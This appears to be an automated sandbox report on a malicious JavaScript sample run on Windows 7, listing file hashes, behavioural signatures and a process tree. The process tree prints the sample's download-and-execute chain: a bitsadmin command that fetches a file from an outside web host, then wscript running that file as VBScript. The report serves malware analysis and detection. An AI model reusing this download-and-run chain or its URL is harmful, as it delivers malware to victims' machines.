Analysis

max time kernel: 121s
max time network: 124s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 28-08-2024 18:19

Static task: static1
Behavioral task: behavioral1
Sample: New_Document-#3765618.js
Resource: win7-20240708-en
4 signatures
150 seconds
General

Target: New_Document-#3765618.js
Size: 441KB
MD5: c7e47553b94c0d18ecf9e03b5ffec68b
SHA1: bfb60db9ad9e0bd41ee2335acaa6316264c0b638
SHA256: 8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a
SHA512: 5a624285b1d9179939495c0f2baa4ecfb7cc9561098977be825ab83b6c90d5e86b4571f5cfa603d9e5e2be76b8e84153a607f26b4263cbff908bb5aca2201194
SSDEEP: 384:JeeeeeeeeeeeRReeeeeeeeeeeReeeeeeeeeeezeeeeeeeeeee8eeeeeeeeeeeRe4:Heo
Malware Config

Signatures

Download via BitsAdmin (1 TTP, 1 IoC)

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
description                    pid   process      target process
1488 wrote to memory of 2304   1488  wscript.exe  bitsadmin.exe
1488 wrote to memory of 2304   1488  wscript.exe  bitsadmin.exe
1488 wrote to memory of 2304   1488  wscript.exe  bitsadmin.exe
1488 wrote to memory of 2708   1488  wscript.exe  wscript.exe
1488 wrote to memory of 2708   1488  wscript.exe  wscript.exe
1488 wrote to memory of 2708   1488  wscript.exe  wscript.exe
Processes

C:\Windows\system32\wscript.exe
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\New_Document-#3765618.js
  PID: 1488
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\bitsadmin.exe
    command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi
    PID: 2304
    signatures: Download via BitsAdmin

  C:\Windows\System32\wscript.exe
    command line: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi
    PID: 2708